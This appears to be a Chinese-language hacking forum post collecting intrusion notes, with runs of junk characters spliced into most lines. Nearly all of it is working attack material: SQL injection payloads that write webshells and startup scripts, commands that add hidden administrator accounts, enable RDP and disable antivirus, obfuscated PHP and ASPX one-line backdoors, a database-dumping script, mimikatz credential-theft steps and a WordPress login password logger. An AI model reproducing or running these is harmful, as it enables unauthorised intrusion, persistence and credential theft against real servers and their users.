SELECT password_hash FROM sys.sql_logins where name='sa'- `  M3 z" `' W
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a8 {2 |8 p7 e* y; @. Z7 ^- P, Z
access中导出shell
$ x" p7 U! @7 O3 N- T, B+ B' ~, v$ t" {& N# d
中文版本操作系统中针对mysql添加用户完整代码:/ z2 x, |# G8 R. z$ f. o- Y9 H

+ [  D- L' J# |& R$ Cuse test;1 |, U2 M0 t! O" L* [
create table a (cmd text);0 m. T+ q: e# T4 x
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
0 l, [; d  l2 @$ ^7 i" uinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
& I" V& z" c9 m0 s: |1 Hinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );  G) p3 P" `( w
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";$ Q7 _; f+ ?1 [
drop table a;
& L0 Q  t9 L3 h7 k) _
1 Y$ ~, m4 o8 J$ R) g1 b1 N" j英文版本:
4 J3 \: A0 \* t" R7 l% G/ \& @/ T% d
use test;
  @, p: J) L8 B" f4 a! d0 o5 ?create table a (cmd text);
4 V+ U& R/ o) |insert into a values ("set wshshell=createobject (""wscript.shell"") " );6 [% K# R; I7 O8 m# I
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );  S) ?$ v  Y6 f$ G% |
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );, a3 V1 W* `* M- }% g
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
& C: [( \9 h: ^drop table a;: B% O# F/ _$ L. z( u1 I; ^
' n* i2 h5 F; k) U6 e* H' H) Z( g8 k8 r
create table a (cmd BLOB);3 m$ O9 q: f' h  c! H! p8 u1 |
insert into a values (CONVERT(木马的16进制代码,CHAR));
. G: N$ _: |; {select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'- H0 n* {2 K1 }$ r
drop table a;  \/ l- H8 P: P

4 `. \; F6 V& d, A记录一下怎么处理变态诺顿3 C2 }6 J6 @, K
查看诺顿服务的路径
2 S: @1 c% ^( c1 O  G+ dsc qc ccSetMgr9 Y3 F8 H* f/ B8 }" r/ u
然后设置权限拒绝访问。做绝一点。。8 z( ^  ^: J/ o+ W1 Z6 [8 `
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
# `! n$ A* i# v+ w8 q2 I! Acacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
- |0 Q2 f2 B! e5 Ucacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators  w; u! g2 o" s" h' d. v6 Q
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone; ]7 h: n. j5 {3 w1 U7 j' {& _

) M( q% q* z1 b+ I# D; d9 o然后再重启服务器3 b8 w  u  ]" C3 M
iisreset /reboot
8 R% T/ ?( Y% M3 n2 p这样就搞定了。。不过完事后。记得恢复权限。。。。
- e2 b# y5 S, _. lcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F' }7 c" [# q4 d! Y+ v% Y& V7 `
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
! M4 z, o8 i% _6 A9 wcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F1 J- v% _0 N7 Y) l; e8 U: U8 t
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F% F3 K0 }; r: d' h0 d. G
SELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin$ T8 T. R9 Y3 {; v7 v+ o
, q6 J) B7 o$ X4 o! j
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')% Y% q2 q( u' g& ?

1 w7 ~. n& H- ?9 u2 D! q. k7 Npostgresql注射的一些东西
, D# c2 s3 B: Q* J( p  X如何获得webshell8 R, T$ I$ ?4 g$ W  H8 T4 n. [* d
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
, U% k* Q" E( |6 D% ehttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
) j2 Q$ w4 e/ f! Y# C3 x+ ?* X) mhttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;) s* W4 i* V' Z; Y
如何读文件
& P1 U) b0 p* W: P# a, Q* Ehttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);, k6 D" [; P  ^8 h) {
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
8 W! t) X3 g+ ~' y+ k4 ?8 d2 Mhttp://127.0.0.1/postgresql.php?id=1;select * from myfile;7 L  V* P0 ?# H
4 D2 F7 s4 X& q' u
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。& s8 p! D7 O/ i5 E8 i4 T6 g
当然,这些的postgresql的数据库版本必须大于8.X  {) N5 j5 w2 }8 H7 K) {
创建一个system的函数:
# C# X; f. ]# O3 j1 \CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
, ^2 I7 y' |% ]# V
1 q6 x& q/ N7 y  F8 k0 e5 _. T5 [9 x0 x创建一个输出表:: c+ E  Z3 j8 y& S3 A
CREATE TABLE stdout(id serial, system_out text)$ p( J- l. K& K% T* _( ~

  g: K9 v9 f5 T  x7 ~$ G  J执行shell,输出到输出表内:4 Q9 C& f, n) u
SELECT system('uname -a > /tmp/test')" F4 R3 ]9 z. ^( e4 n" x7 P3 q: |
' d2 w7 q- L; T* P% Q
copy 输出的内容到表里面;
9 ]* h- p: D$ A/ CCOPY stdout(system_out) FROM '/tmp/test'
( l9 ?) e! [- p/ G: w: P- D8 t( }% F% B" ^
从输出表内读取执行后的回显,判断是否执行成功
+ E- l4 c7 d: _, I# L) W1 G1 q5 Z9 Y/ j4 h* x$ d/ U
SELECT system_out FROM stdout0 j- e% X: \4 _
下面是测试例子! ^; u( \8 {& m2 a( P

3 {( ?$ a1 U6 k9 S/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- ' `" r5 k& D* f* g
4 l' R! U) }3 r" q  L* x
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
% R$ t8 f$ d; j( l1 W5 a: f7 RSTRICT --& d: }4 z( V7 ^  g

, O$ u  Q) p3 m/store.php?id=1; SELECT system('uname -a > /tmp/test') --  C) ^) R( d' F! p* D) q

+ C5 O2 }/ i0 I! w/ B/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
; T; M4 b( m# e. l$ [3 m8 k! E, [6 A
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
7 j: a' z6 H! e' _5 {net stop sharedaccess    stop the default firewall
8 }1 G% e! J2 w# p/ D: Dnetsh firewall show      show/config default firewall
) o. v- L1 B2 ?3 z+ j+ gnetsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall9 x% ~3 t6 C; a/ @/ D
netsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall7 J9 Z, {, C; R
修改3389端口方法(修改后不易被扫出)
, v/ Y1 F' A5 y  ?修改服务器端的端口设置,注册表有2个地方需要修改
/ |8 U) N. h1 L( l( g! O; P8 w6 n% f3 Y
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]% T  c0 f% [/ W1 y, \  Z) [, u
PortNumber值,默认是3389,修改成所希望的端口,比如6000+ T9 E3 Y, f2 V! O6 `7 r) L

- A/ R1 d7 J" B9 `第二个地方:
/ B+ r, J# ~8 \) l" I5 L[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] ) T; W: h1 |" }; c  }) Y
PortNumber值,默认是3389,修改成所希望的端口,比如6000
2 }6 L, t8 x. e& w+ f
9 D9 Z7 F8 t: Z  t现在这样就可以了。重启系统就可以了
' k. K* l: I/ y2 b- D- t! \
' e8 [0 Z; S5 E查看3389远程登录的脚本  E& X% |' }4 t
保存为一个bat文件
  o: |) ?' F  T/ |2 vdate /t >>D:\sec\TSlog\ts.log/ F7 M8 _& r& l5 V: y8 Q
time /t >>D:\sec\TSlog\ts.log$ D$ [1 b) v1 ^
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
3 Q2 {! X6 @# Lstart Explorer
  j& D% W! E2 _' D8 x2 T" v; B0 R9 g. a  Z* t7 K% K
mstsc的参数:
! B/ ~5 S$ T: Z) i- E9 a! P1 U4 ?- D. h9 x; [$ r
远程桌面连接& P9 l. _. [% W7 V7 B' K. j

. O: V2 f6 `7 ^' OMSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
# a9 `8 Y2 q7 ^1 h, a7 Q, \) L( R5 ~  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?  {' S( J, F$ V6 n! p  n

3 Y, e4 g5 h( e" n1 ]<Connection File> -- 指定连接的 .rdp 文件的名称。$ J8 `/ {2 T0 g8 g! y
0 u$ x: A5 \* A, {* S
/v:<server[:port]> -- 指定要连接到的终端服务器。% p' ~' w% R# |" v9 j

) _: J1 o( O: A8 q9 v: L/ {/console -- 连接到服务器的控制台会话。
, g6 D8 [4 b* w
0 @/ X) S( F6 A/f -- 以全屏模式启动客户端。
' I9 i% V+ \% a. L
9 x' X" M0 W+ U7 q! J- o) R/w:<width> --  指定远程桌面屏幕的宽度。" d3 a/ ?. ?" s- g

& ?$ i5 C1 t( F0 E5 f, G5 r/h:<height> -- 指定远程桌面屏幕的高度。
" E5 Y% j0 a: }. v; T3 q7 E* }
! b! H0 G$ r7 q& G/edit -- 打开指定的 .rdp 文件来编辑。+ A: x) q) v4 b
0 k6 \. h0 L3 t4 t( _  n# w, b$ O" f
/migrate -- 将客户端连接管理器创建的旧版
% v: w$ `3 ~7 |3 e6 J! L, Z; p3 }3 n连接文件迁移到新的 .rdp 连接文件。. O; N0 ~0 r  ?; I

5 ^: Z/ f1 N  {$ }3 Z: B5 O
; @$ H3 H3 l" \$ ~! y3 u其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
) H2 H. I, ?: D1 r8 X) Z% n& I; T+ ~mstsc /console /v:124.42.126.xxx 突破终端访问限制数量. R) ?. q$ `# ~" O
$ f# P/ n8 E( h2 h$ j) m' I
命令行下开启3389( }2 d7 r2 n/ \) a. Z
net user asp.net aspnet /add1 H" r6 x- F' l+ p' _$ B
net localgroup Administrators asp.net /add, m" s/ Q& a4 H* U  K0 ?/ y
net localgroup "Remote Desktop Users" asp.net /add
+ @. ~# e, J7 r" q( i6 ^attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D0 M9 C" y4 V, R- P& p
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
* }" u( C: ?6 z7 T; h! V/ F9 {* i0 kecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1! D5 H4 \" h$ l7 r' U  ^! h! X, h
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
! O% H: m" h9 Esc config rasman start= auto' G: U+ _% O# K6 y
sc config remoteaccess start= auto+ o, `0 `$ k+ \+ J6 L+ x
net start rasman
9 b6 t  P- e, t- n- i. ^net start remoteaccess
/ S; ^4 x$ n5 x0 gMedia
1 ^7 o. J' |& X6 q" t" A<form id="frmUpload" enctype="multipart/form-data"8 ]* v5 t' P- J, B5 ?
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
( x) X' P5 \. Q9 V3 c0 A* q<input type="file" name="NewFile" size="50"><br>  h) k3 R0 O2 j( C
<input id="btnUpload" type="submit" value="Upload">) k$ S: h5 e7 ~5 Y/ w4 s+ h
</form>
; I: u! i5 Y- e+ |! I4 u6 [, F" c: Y5 _( E8 F5 j0 ~# j
control userpasswords2 查看用户的密码
0 V+ x0 z# E) a1 e( l, H% saccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
, }& b" x' e; V! v* aSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a; X) t+ h* f7 H- R% o7 C

( f4 U% y9 w, g+ Z141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
8 N( \9 w+ ~, U; s测试1:
+ L& b2 J) @% g8 WSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1- j8 ^0 q/ D( i5 p( a3 ]$ d
  j8 e' ^- R' ]
测试2:/ h: ]$ T2 {! ^# f0 R
- @# w7 x' I; F: Q: X$ ?+ T$ \
create table dirs(paths varchar(100),paths1 varchar(100), id int)
& `: q  E9 @  A! z: [' x; Q; c7 V' n9 Q) A) ]# ?
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
# R* N/ k% [% X
; b, h, @0 l7 W! JSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
( F9 r2 _  O. {关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令2 W- y, j: J& o  c+ w1 y
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;) u, Z: v: J4 T4 _* ]
net stop mcafeeframework
% j- C  u; I( \# k% S1 [net stop mcshield" n4 p9 |2 @: n' f# _0 |# d
net stop mcafeeengineservice
0 J! x; j/ G% }6 I9 g7 N" J6 O5 Knet stop mctaskmanager( B! D6 }* Q, O" K& c0 E
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
% d* k8 s  w5 u' [  u- k
7 f9 R& N. k, h/ x7 L  VNCDump.zip (4.76 KB, 下载次数: 1)
2 D" g+ h$ G% b* ?密码在线破解http://tools88.com/safe/vnc.php3 t2 E" u2 _% @8 o  C: v
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取% p/ K4 Q8 [) s( M, Q3 B  L
* ^! q! _* G5 C+ M. W
exec master..xp_cmdshell 'net user'
1 e- e7 u2 d, P; Cmssql执行命令。' z' s) p( {! _; c+ h
获取mssql的密码hash查询
' o+ ~; J# U! G3 d! f2 pselect name,password from master.dbo.sysxlogins
6 x) M; H; K& r/ b; g5 C
* b6 E2 Z! S, _, Wbackup log dbName with NO_LOG;
- K! s# ~' l+ O$ `) `. X, ]backup log dbName with TRUNCATE_ONLY;
. P1 s% |$ m8 f3 y3 _DBCC SHRINKDATABASE(dbName);8 p. S$ a% M3 d# K9 V
mssql数据库压缩
! ?) |7 S/ [  _1 [) L6 y
# H6 S3 B' M1 a- D+ [- qRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK$ ]3 f! v* m! G
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。* D" t6 s+ o4 Q& [; u

8 Z5 S5 B6 P$ w8 ]$ ?: \backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
9 W) S9 f3 _% O备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
8 J, E: }8 {( U* v! x
4 {5 u8 n, _6 @2 J; _Discuz!nt35渗透要点:
2 D0 ?; M: F1 |7 h- M(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
' \3 f* \6 J/ N1 K' k(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
8 B+ V* W' X6 f* W( C/ n, ^(3)保存。
% x3 o! d. e, z0 q" e(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
# c1 e3 N7 g, x. T$ xd:\rar.exe a -r d:\1.rar d:\website\* ^  F# n; E8 J8 J% ~5 P) ?
递归压缩website& A, y0 B0 _7 i5 a4 m
注意rar.exe的路径6 T5 H7 J  x" t/ S* h: `' o
5 v" y. R; c' x# D1 M  ]
<?php
( M3 ?! q5 r% l& B  U- C- u5 ^$ S+ q( g1 V8 f7 Y
$telok   = "0${@eval($_POST[xxoo])}";
: y3 P$ c6 o6 v& {5 s$ c" w8 p) V4 E# `! b, Y" @6 N+ E- N
$username   = "123456";
7 _4 X# L! R/ W" ^
0 D9 }0 g& E1 J5 B  }$userpwd   = "123456";
8 G: z9 |5 @& i; ~. z
2 I+ r9 j9 p# V' C0 s' \. _5 O$telhao   = "123456";
7 ?3 g# J( L7 R7 n: c$ H6 l1 u- B; D, B
$telinfo   = "123456";
# F7 O9 @  }& h0 t! E/ G9 M2 T" G+ A' a0 t! p3 [# q
?>! @) k% J2 W8 |; n/ U% p
php一句话未过滤插入一句话木马8 `- I8 |+ K+ M5 g

$ p& z- Q- ~. M- P站库分离脱裤技巧$ U6 J! z) h* O' M" K
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'! G/ U5 P1 p) y3 Q0 r
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
+ ]# l0 C3 z1 u* _/ P6 S条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。" p/ u* A: P/ O' S5 o( s
这儿利用的是马儿的专家模式(自己写代码)。4 ?# B% z8 [, `% v
ini_set('display_errors', 1);
1 u! q% A' ?! ]: j1 g; o+ g+ {: Eset_time_limit(0);/ W7 N  f0 Y4 i+ y
error_reporting(E_ALL);" J$ U- J& z. `8 O
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());: |  \* t0 f3 }; l3 Q; s' g/ _6 w) B
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
4 g7 S" C" ~) c; A$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
1 T# T# v& @) m) ^  U$i = 0;5 ~+ p* W4 \1 b' C6 P& O- Y
$tmp = '';
/ _8 s/ w& m2 p  C3 h2 A3 Hwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {
: R0 B) P1 ~  o. O3 C7 `# ^- s    $i = $i+1;8 M6 ]# E% @, S& j# r5 {" F) |6 U; F
    $tmp .=  implode("::", $row)."\n";
: H3 p; c/ b/ A* G' F8 T# e    if(!($i%500)){//500条写入一个文件
" }7 {" i5 x. z+ f        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
4 j% A0 s1 I7 B8 p        file_put_contents($filename,$tmp);. ^) L8 e; a0 I1 b. |6 Y
        $tmp = '';
; @8 u5 f1 M8 J  H: @; w7 _    }
+ f4 L& O$ i: U! [5 r9 ?! B}( e: g8 D# O- Y+ O4 j% n* |# T
mysql_free_result($result);0 B' e* y$ S# B  K+ h7 S, j$ K

! N7 B5 P5 ~/ W9 _' L, a
' n' a  k- K9 t; j, d0 n
/ \4 n- G! O0 q6 C. ~' Y4 S//down完后delete/ K* B  E# b3 n  g: {* q; h
0 y$ R. {5 {7 b9 e- m0 j+ W
+ |& ^! h* Z( k0 Y  x4 @, o* r
ini_set('display_errors', 1);
2 k" ~: t* [( T+ p, P+ Y) e" q+ ^( Rerror_reporting(E_ALL);
+ R) J0 T- `( ~$i = 0;# v: J) U% v9 v6 y6 q! V8 G. |
while($i<32) {( G9 h6 A* J8 X* s# ^
    $i = $i+1;
& T' Z' P- i$ ^) M/ f        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
, }6 ~+ i- @4 n        unlink($filename);
4 K- f; ^; r0 A} 3 q$ t; j& I) X8 e8 x- a  \
httprint 收集操作系统指纹$ R2 A% Y9 s! U7 t; f/ {; `
扫描192.168.1.100的所有端口' p9 S9 D. O0 R, l* N8 x$ O$ d
nmap –PN –sT –sV –p0-65535 192.168.1.100
* ]+ q3 ], ~( [- R0 }8 e; ihost -t ns www.owasp.org 识别的名称服务器,获取dns信息2 A5 R/ h- d, s" B' \& X+ W7 X# F
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
# x  z' w. R) \; `7 @Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host# I2 f2 J; E5 l1 G) s; c" D
  A; X# Q) `! k; e
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
; y4 _9 L9 Y  l* R6 l/ P) B
- [! j8 ?/ i1 K( ~4 n  MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
& H- E9 N; p. U& Z$ R7 r9 Y7 A7 J/ H1 @2 H# Y% t* P+ h
  Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
" s8 z  P+ K9 z% ^6 ?1 E
+ z- g' M. y) v1 {5 t  DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)# ^7 t, I8 k) k
' G; `1 D% e9 N- Y. U/ W
  http://net-square.com/msnpawn/index.shtml (要求安装)0 h" I% C' p" `2 Q( }

% a! N, ]. i" y; G! v  tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的). |. Y1 _1 q1 B$ N$ h5 s3 r

: S9 ]" g  h6 n* l1 I& J  G  SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
) o3 Z/ H' h2 U5 ?3 E' qset names gb2312, Q- P9 }4 y; f
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
# L' s1 x- G1 p, [, m: X
- O' ?% v, z2 Pmysql 密码修改5 \9 E1 h( D: o2 @  R
UPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ”
: E! p! f; \8 Y( `) k) Eupdate user set password=PASSWORD('antian365.com') where user='root';
3 C+ P' e& L) O6 Iflush privileges;8 G* i7 h) A1 f7 d  V; j! J
高级的PHP一句话木马后门- {2 N( k! \& e& x
3 V" |3 ~4 \# G: a$ @: D
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
- @1 R8 ?* W) t2 I" b/ |& F
5 t6 B7 I2 Q2 k$ F1、
$ O3 W7 l4 u% T4 j, n5 E3 }& q5 F9 V/ x3 y9 K( K5 V
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";" x) \% p% ^) j( V- j* L

4 H' I+ C* M. l/ S$hh("/[discuz]/e",$_POST['h'],"Access");3 L. Q8 ~% W, a

& h; S9 X6 P: s" P5 _//菜刀一句话
9 B9 Y5 P1 J4 p6 g! p3 Y" g" N+ m2 G2 p" p" O' O% U
2、: f8 Z+ F$ S5 I  p

: m7 B2 s! H+ y) Z0 T" t4 P$filename=$_GET['xbid'];% h, q$ {8 Y2 Q4 Y

0 `2 I' K# b' X3 Finclude ($filename);
' h, h# `8 Y  m7 n4 F) K( ?' ^% d0 v* [/ L4 e& M4 J6 x
//危险的include函数,直接编译任何文件为php格式运行* x9 h, e* W2 J1 l: n! o
' Z" J1 K  K9 c3 m4 G
3、( y) c9 l# R( }

& M' P8 [. }6 M3 T3 g$reg="c"."o"."p"."y";
2 N- H6 {: V. G3 J6 H4 _# C) G; P! J" E* g! i8 l3 s" t/ y
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);  @7 o7 x+ W% S, k1 O: T$ V

- k4 O& u0 Z4 T! N6 Y//重命名任何文件/ W6 X3 z! }, \. ^7 a& x+ i

7 B+ V1 t; l; m9 ~4、
& S0 ^5 c( ~' Z" g
* S6 A+ P- I4 k$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";! x; _; {0 v0 {- t
$ O& t. A8 a- T
$gzid("/[discuz]/e",$_POST['h'],"Access");8 b% z2 E5 P- Y  h4 Y; B+ \% o0 \
8 S0 L2 r0 l; ]+ b$ M% ^
//菜刀一句话
8 Z# ~, U- x7 e$ J  ?0 n$ m) p- S
5、include ($uid);
! A* c$ q; C) v# j# X- ~% L' }% O) \' S6 m. [  T- X8 \
//危险的include函数,直接编译任何文件为php格式运行,POST
! b! W/ ^# T" C- W6 k$ W) e
# H) f! v: [. v& z0 m$ t6 T( i, j, [' T* p6 Z) @7 g
//gif插一句话+ v( i. Z# n+ t

% q+ L: U( `3 G% \6、典型一句话) b# S1 B5 `2 f" T
: b. x! g" S! n6 I# ^$ G
程序后门代码2 M# Z1 Z* [: Q2 J! l" q7 \- y
<?php eval_r($_POST[sb])?>3 g$ R& x" y2 w% E
程序代码
1 |9 `9 i$ M" Y, Y" N- g<?php @eval_r($_POST[sb])?>
" x3 h1 u  O1 g. Y//容错代码) j" \7 o1 u1 B8 a
程序代码
* f: c: S: W9 l<?php assert($_POST[sb]);?>
; c& S) |( t4 r3 c: s" m* o; G//使用lanker一句话客户端的专家模式执行相关的php语句# }7 v% X' a  i8 a5 y% E
程序代码, j( n" t- ]& v, Y
<?$_POST['sa']($_POST['sb']);?>9 b( p" M7 G! e; `1 H6 U
程序代码% m  y$ Z6 M& O# c. Q& s
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>5 K* F& F. Z) m: P# S
程序代码
8 e# C! z) D  Z. B<?php: T  [( C; F( j7 w' U, V; _! r- ^
@preg_replace("/[email]/e",$_POST['h'],"error");% H; F5 {* d/ r; e# R0 ?
?>
0 Q5 F1 \  r+ J, p" \6 ]3 T//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
, v; [& r1 `: P- p程序代码+ b% ?; X, v5 U2 `% f- ]  T1 P1 @
<O>h=@eval_r($_POST[c]);</O>
  c. i; b; g, N程序代码
, j5 A7 S- N- @( ]5 i+ }<script language="php">@eval_r($_POST[sb])</script>
+ o3 i1 n! |/ [& ~6 P- i0 [& r//绕过<?限制的一句话
! O5 t  O: A! h% ?+ k! J( ]+ _1 O5 U" Y# F" _. l9 V3 |' |( r
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
7 s3 r4 }+ p9 p4 P' `4 W+ y8 Z! @详细用法:0 [, w& Y4 Z5 |
1、到tools目录。psexec \\127.0.0.1 cmd. W, p% t0 R( q
2、执行mimikatz
7 |' I2 g/ I  `- b9 ?# K3 F. o3、执行 privilege::debug
" j/ f+ M+ {+ p5 c+ H( S4、执行 inject::process lsass.exe sekurlsa.dll
- F/ @( i$ ~7 r: W; N% u8 Z5、执行@getLogonPasswords
/ a/ b, R% h2 r3 x2 k  M6、widget就是密码
' {8 d3 t. u6 v7、exit退出,不要直接关闭否则系统会崩溃。
4 B1 _6 p% b8 E+ Q+ M1 O& Z3 y* \
  m& s  R- W8 C( Z$ W+ Bhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面; g, j! i# h0 S: B2 T

- \: I- K# w# j- M/ E自动查找系统高危补丁' w- {% R; T% V! p% R: W* a
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt6 i; E, P) q7 m3 i3 l& d

3 X, O) ?+ w# a' r; s突破安全狗的一句话aspx后门4 U! n. S  z: i- p
<%@ Page Language="C#" ValidateRequest="false" %>
" D5 U* _0 V0 N) k; {<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>  N5 k* _2 k! E0 m
webshell下记录WordPress登陆密码/ p9 a6 I# n# Q6 y& a8 y6 J
webshell下记录Wordpress登陆密码方便进一步社工8 k# }& u% L; U$ Z. n( P
在文件wp-login.php中539行处添加:
8 n" C+ |4 [4 V; _! W+ i- @8 X, I, Q8 H// log password
$ N1 m5 L7 y# A0 A/ y$log_user=$_POST['log'];
) p) p* {. X4 x% l, d) m4 i7 `$log_pwd=$_POST['pwd'];
. Z1 ^# U- z% m5 ~* S) ~4 \$log_ip=$_SERVER["REMOTE_ADDR"];5 h0 [$ u) h8 G: B& G! d3 b
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
, ?0 r; U! }+ @, V# v+ p$txt=$txt.”\r\n”;
' {+ r  e9 Q% \! |0 D# h2 H$ pif($log_user&&$log_pwd&&$log_ip){5 J. \8 n: L$ C. ?
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);( P- b/ H. z4 Z% u5 V
}
1 x6 @* G7 v  K+ Q: ^" L4 ^当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
